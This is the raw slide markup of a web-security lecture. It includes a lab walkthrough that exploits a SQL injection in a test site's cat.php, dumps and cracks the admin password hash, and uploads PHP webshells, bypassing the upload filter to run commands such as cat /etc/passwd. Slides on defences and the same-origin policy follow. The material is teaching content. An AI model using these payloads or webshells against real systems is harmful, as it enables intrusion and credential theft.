            </a:r>
          </a:p>
        </p:txBody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HTML (URL) Encoding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converts characters into a format that can be transmitted over the internet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ASCII character set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*unsafe* ASCII characters are replaced by %XX were XX are two hexadecimal digits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spaces are replaced with %20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="4" indent="-342900" marL="2286000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>or by a plus sign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http://www.w3schools.com/tags/ref_urlencode.asp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="650" name="Shape 6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86625" x="4739025"/>
            <a:ext cy="2581275" cx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4" name="Shape 6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5" name="Shape 6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unicode encoding</a:t>
            </a:r>
          </a:p>
        </p:txBody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unicode = universal character set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aims to be a superset of all other character sets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aimed for broad language support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http://www.w3.org/International/articles/definitions-characters/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UTF-8 uses 1 byte to represent characters in the ASCII set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two bytes for characters in other alphabets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3 bytes for things in the "</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>asic </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ultilingual </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>lane"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4 bytes for supplementary characters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UTF-16 uses 2bytes for anything in the BMP, 4 bytes for supplementary characters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UTF-32 uses 4 bytes for all characters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unicode character escapes</a:t>
            </a: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character escape is a way of representing the character without using the character itself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%20 is space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%41 should be 'A'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etc..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useful info for attackers when bypassing filters!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6" name="Shape 6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7" name="Shape 6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Manually detecting web vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody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Can fuzz the actual HTTP requests with the proxy (burspsuite / web scarab).   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" i="1"/>
              <a:t>Fuzz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>things like the login page, etc...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Can also detect sql injection.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goto http://192.168.43.130/cat.php?id=1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and try adding </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> onto the end of the URL.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124" name="Shape 124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25" name="Shape 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3358538" x="2870089"/>
            <a:ext cy="915299" cx="213899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126" name="Shape 126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127" name="Shape 127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128" name="Shape 128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129" name="Shape 129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130" name="Shape 130"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="129" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3014544" x="904349"/>
            <a:ext cy="276300" cx="36174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1" name="Shape 131"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off y="3506875" x="874349"/>
            <a:ext cy="150600" cx="368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2" name="Shape 132"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="129" idx="3"/>
            <a:endCxn id="124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33" name="Shape 133"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="128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34" name="Shape 134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35" name="Shape 135"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="129" idx="2"/>
            <a:endCxn id="126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36" name="Shape 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1557500" x="513285"/>
            <a:ext cy="1205820" cx="210011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137" name="Shape 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3691100" x="2084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138" name="Shape 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4072100" x="11228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139" name="Shape 139"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1883844" x="2613400"/>
            <a:ext cy="1095899" cx="1332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Packet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140" name="Shape 140"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3251480" x="220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Parameter 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141" name="Shape 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3784880" x="4797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142" name="Shape 142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3708680" x="57114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143" name="Shape 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2946680" x="57876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144" name="Shape 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2260880" x="4492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145" name="Shape 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1422679" x="601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XML Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Shape 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704166" x="5648201"/>
            <a:ext cy="777000" cx="78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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="Shape 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1704166" x="4581182"/>
            <a:ext cy="777000" cx="9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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Shape 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4752166" x="39435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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Shape 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5590366" x="41721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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="Shape 150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5666566" x="53913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AND MORE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="Shape 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1734450" x="1290425"/>
            <a:ext cy="4925825" cx="7576092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/>
              <a:t>Huge attack surface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Manually detecting SQLi vuln</a:t>
            </a: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http://192.168.43.130/cat.php?id=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'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This will escape the prepared sql statement, breaking the syntax, and resuling in a SQL error.  This tells us that it is running SQL, and has a SQLi vuln. There many ways to do this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You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1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is an example of </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error-Based SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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8" name="Shape 6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Well..</a:t>
            </a:r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 seems that only that ONE page (cat.php) has a vulnerability with the id parameter.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The rest of the results aren't SQLi related, and we've covered those topics before.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4" name="Shape 6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so lets exploit this single vulnerability (SQLi time)</a:t>
            </a:r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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>=1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is SQLi vulnerable, but we don't know what the SQL query behind it in the cat.php code looks like.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So lets find out how many columns it is requesting.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Union-Based SQLi for beginners</a:t>
            </a:r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FUN FACT:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>All queries in a SQL statement containing UNION operator must have an equal number of expressions in their target lists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i.e.....  A UNION B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must have the same # of columns.  But we can use this to enumerate the columns of a statement.....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6" name="Shape 6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Union-Based SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF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UNION SELECT ALL 1--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The used SELECT statements have a different number of columns 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=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT ALL 1,2--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The used SELECT statements have a different number of columns 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=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT ALL 1,2,3--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The used SELECT statements have a different number of columns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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"The UNION SELECT ALL ...." part is a common SQLi trick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y="2199125" x="5947650"/>
            <a:ext cy="403499" cx="2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This is integer based, so no tick required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Union-Based SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody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=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNION SELECT ALL 1,2,3,4--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Success! we get a valid, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>populated</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> webpage back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So this prepared statement has 4 columns.  This technique works when SQL error messages are disabled (and Error-Based SQLi does not work).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i="1"/>
              <a:t>toying around with these params will reveal what does what.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Union-Based SQL Injection</a:t>
            </a:r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OK its 4 columns, lets try unioning with other tables.... but we need to find the tables and other info.... like:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>database(), user(), @@version,@@datadir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12" name="Shape 712"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off y="3626550" x="6874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{B3FFB6D0-1F6A-4CC2-B485-ACA40B8A52EB}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database(), 2, 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reveals database name == photoblog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user(), 2, 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reveals database name == pentesterlab@localhost</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marR="91425" marB="91425" marT="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="5649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@@version, 2, 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/>
                        <a:t>reveals db version == 5.1.63-0+squeeze1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@@datadir, 2, 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reveals the DB is stored in /var/lib/mysql/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get the table names</a:t>
            </a:r>
          </a:p>
        </p:txBody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Most SQL Databases have a table in each database called "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>", which is always interesting.  We can grab all table names and column names from it. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>Once you know the DB type and version, this info is easy to determine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 can use the following SQLi to extract this info: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... UNION SELECT 1, table_name, 3, 4 from information_schema.columns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2" name="Shape 7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there's a user's table, lets get some column names</a:t>
            </a:r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 can use this same technique to get all the column names across the DB.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... UNION SELECT 1, column_name, 3, 4 from information_schema.columns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Reveals the following interesting column names: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id, privileges, user, host, db, command, login password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8" name="Shape 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Excellent, lets break in to the admin console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...UNION SELECT 1, login, 3, 4 from users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reveals a login of "admin"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... UNION SELECT 1, password, 3, 4 from users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lv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reveals a password hash of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8efe310f9ab3efeae8d410a8e0166eb2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which after cracking reveals the password is:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>P4ssw0rd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 used http://www.md5decrypter.co.uk/ and it took seconds.  </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>moral of the story: MD5 is dead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Obligatory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Comic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834" x="3778958"/>
            <a:ext cy="6401240" cx="490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y="274637" x="457200"/>
            <a:ext cy="1143000" cx="388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We can't stop here...</a:t>
            </a:r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its sh3ll country :)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That was just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the admin console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for that stupid website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7" name="Shape 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75692" x="4300962"/>
            <a:ext cy="6955668" cx="491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1" name="Shape 7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can upload a file</a:t>
            </a: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Hmm what could go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wrong?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="744" name="Shape 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4733925"/>
            <a:ext cy="2800350" cx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8" name="Shape 7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9" name="Shape 7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Uploading a webshell and Code Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody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&lt;? php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system($_GET['cmd'])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?&gt;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This code when put into ANY webpage can be a small webshell.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code will take the content of the parameter cmd and executes it... i.e.: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192.168.1.130/admin/uploads/shell.php?cmd=ls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4" name="Shape 7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webshell code</a:t>
            </a:r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&lt;?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if ( strcmp( $_GET['cmd'], "" ) == 0 ){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  echo "15825b40c6dace2a" . "7cf5d4ab8ed434d5";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}else{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  system ( $_GET['cmd'] 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?&gt;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This bypasses T_String parse error.  Found in w3af attack payloads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shell notes</a:t>
            </a:r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command you run is run in a brand new context, independent of previous commands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webshell has the same privileges as the web server running the php script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There are ways to filter out uploaded php,python, etc files... but there also ways around those filters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you can easily </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" i="1"/>
              <a:t>trojanize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>any open source webapps (i.e. drupal, wordpress, etc..) by adding webshell code to them and overriding the target file on the webserver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7" name="Shape 7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Fail</a:t>
            </a:r>
          </a:p>
        </p:txBody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 seems to filter out the php file somehow. And spews back this error:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:b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"NO PHP!!"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2" name="Shape 7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Bypassing the filter: file-type fuzzing</a:t>
            </a:r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y="1600200" x="457200"/>
            <a:ext cy="4967700" cx="1371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uploading a .jpg gives us the following.  Pay attention to the content type at the bottom...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rPr sz="1200" lang="en"/>
              <a:t>Here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="775" name="Shape 7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1866900"/>
            <a:ext cy="5143500" cx="72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Shape 776"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5426425" x="968400"/>
            <a:ext cy="357299" cx="841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0" name="Shape 7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1" name="Shape 7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Bypassing the filter: file-type fuzzing</a:t>
            </a:r>
          </a:p>
        </p:txBody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y="1600200" x="457200"/>
            <a:ext cy="4967700" cx="133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The webshell is interpreted as "application/octet-stream" content.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rPr sz="1200" lang="en"/>
              <a:t>Lets change that to "image/jpeg" and see what happens to the filter.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="783" name="Shape 7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1750" x="1838325"/>
            <a:ext cy="4838700" cx="73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8" name="Shape 7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Still fail </a:t>
            </a:r>
          </a:p>
        </p:txBody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Must be filtering by something else,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try renaming it to shell.php3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.php3 is a still recognized artifact filetype from the late 90's when php was young.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="790" name="Shape 7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08762" x="5248537"/>
            <a:ext cy="2505075" cx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4" name="Shape 7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Success</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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31487" x="5504776"/>
            <a:ext cy="2726512" cx="363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http://192.168.43.130/admin/uploads/webshell.php3?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>whoami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reveals it is being run under account "www-data"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 try: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>http....</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>/admin/uploads/webshell.php3?cmd=</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en" i="1"/>
              <a:t>cat /etc/passwd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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GAME OVER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165" name="Shape 165"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3756338" x="7924507"/>
            <a:ext cy="1143299" cx="11753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66" name="Shape 166"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3988142" x="4811468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167" name="Shape 167"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="6610621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Authentication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168" name="Shape 168"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="7916629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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Shape 169"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2787096" x="7836664"/>
            <a:ext cy="927300" cx="126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Web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170" name="Shape 170"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3434605" x="6125575"/>
            <a:ext cy="999432" cx="1343249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171" name="Shape 171"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="170" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3244621" x="2458075"/>
            <a:ext cy="689700" cx="36675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y="3539498" x="2199961"/>
            <a:ext cy="566699" cx="395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3" name="Shape 173"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="170" idx="3"/>
            <a:endCxn id="165" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3934321" x="7468824"/>
            <a:ext cy="393600" cx="45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74" name="Shape 174"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="169" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="3250746" x="7412764"/>
            <a:ext cy="391800" cx="42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75" name="Shape 175"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4433998" x="7324863"/>
            <a:ext cy="559799" cx="66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76" name="Shape 176"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="170" idx="2"/>
            <a:endCxn id="167" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4434037" x="6797199"/>
            <a:ext cy="534300" cx="40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77" name="Shape 177"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="7021869"/>
            <a:ext cy="618300" cx="622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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Shape 178"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="6172864"/>
            <a:ext cy="618300" cx="744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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="1000" lang="en"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="Shape 179"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5097051" x="5665543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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Shape 180"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5763989" x="5847435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Silverlight</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Shape 181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5824620" x="6817528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AND MORE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1578075" x="491625"/>
            <a:ext cy="7496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Some of you wondered how attackers or malware actually apply some of the techniques we've covered (i.e. buffer overflows, shellcode, etc...)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="Shape 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3064799" x="2192950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   +  NAT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Shape 184"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2986550" x="3822300"/>
            <a:ext cy="1646891" cx="1376460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4277025" x="454750"/>
            <a:ext cy="6143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y="2143425" x="5636350"/>
            <a:ext cy="6143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4658029" x="2789900"/>
            <a:ext cy="872699" cx="2433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Data received by web browsers can include data plus CODE (e.g. javascript)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5395450" x="1720650"/>
            <a:ext cy="725099" cx="35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code is run on the client's machine (usually in a sandbox today)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y="5960800" x="983225"/>
            <a:ext cy="638999" cx="349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Problem????  :D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1" name="Shape 8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2" name="Shape 8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injection vectors</a:t>
            </a:r>
          </a:p>
        </p:txBody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LDAP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XPATH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XML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XSLT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OS commands (system("...."))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logs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javascript interpreter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7" name="Shape 8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8" name="Shape 8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Defending against Injection attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody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https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet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The basic defenses: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" lang="en"/>
              <a:t>parameterized queries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Not vulnerable to injection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not always an option!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 stored procedures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does not dynamically build the SQL statements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Encoding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3" name="Shape 8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SQLi injection attack cheat sheets</a:t>
            </a:r>
          </a:p>
        </p:txBody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rgbClr val="1155CC"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet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http://ha.ckers.org/sqlinjection/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5"/>
              </a:rPr>
              <a:t>http://www.veracode.com/security/sql-injection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9" name="Shape 8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0" name="Shape 82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Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="821" name="Shape 82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OWASP's #2 top vulnerability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5" name="Shape 8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Cross Site Scripting (XSS) Formal Assessment</a:t>
            </a:r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828" name="Shape 8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15625" x="0"/>
            <a:ext cy="4648079" cx="912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2" name="Shape 8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3" name="Shape 8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First, some browser notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="834" name="Shape 8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8" name="Shape 8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Browser Security &amp; Policies</a:t>
            </a:r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Same Origin Policy (SOP)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/>
              <a:t>The same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin.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meant to prevent cross-site issues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evil.com cannot access content from bank.com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SOP Implemented differently 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AND CAN BE CIRCUMVENTED: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http://www.ubergizmo.com/2014/01/chrome-exploit-can-allow-hackers-to-listen-in-even-after-a-tab-is-closed/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" lang="en"/>
              <a:t>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z="3000" lang="en"/>
              <a:t>GET / POST request can be made from one domain to another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1" name="Shape 8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128200" x="2132572"/>
            <a:ext cy="363075" cx="487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5" name="Shape 8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6" name="Shape 8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SOP</a:t>
            </a:r>
          </a:p>
        </p:txBody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 / POST can only be read under the following conditions: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ports match on both sites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domain matches on both sites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subdomain matches on both sites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8" name="Shape 8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834448" x="1466007"/>
            <a:ext cy="2733452" cx="723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2" name="Shape 8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3" name="Shape 8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SOP Exceptions</a:t>
            </a:r>
          </a:p>
        </p:txBody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Two different subdomains (thus different origin) under the same domain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i.e.     secure.live.com vs vulnerable.live.com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wildcards!!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*.google.com or *.live.com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Risk here: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Domain lowering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i.e.     secure.live.com vs vulnerable.live.com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8" name="Shape 8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SOP and Scripts </a:t>
            </a:r>
          </a:p>
        </p:txBody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When exposing or including a resource cross-domain such as JSON, or javascript, or etc...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Javascript APIs allow documents(webpages) to directly reference each other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218181"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en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iframe.contentWindow</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" lang="en">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 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218181"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en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window.parent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" lang="en">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, 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218181"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en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window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" lang="en">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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218181"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" lang="en">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1100" lang="en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window.opener</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" lang="en">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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When documents do not have same origin, access is limited to the </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> objects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Some browsers allow more access though.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196" name="Shape 196"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
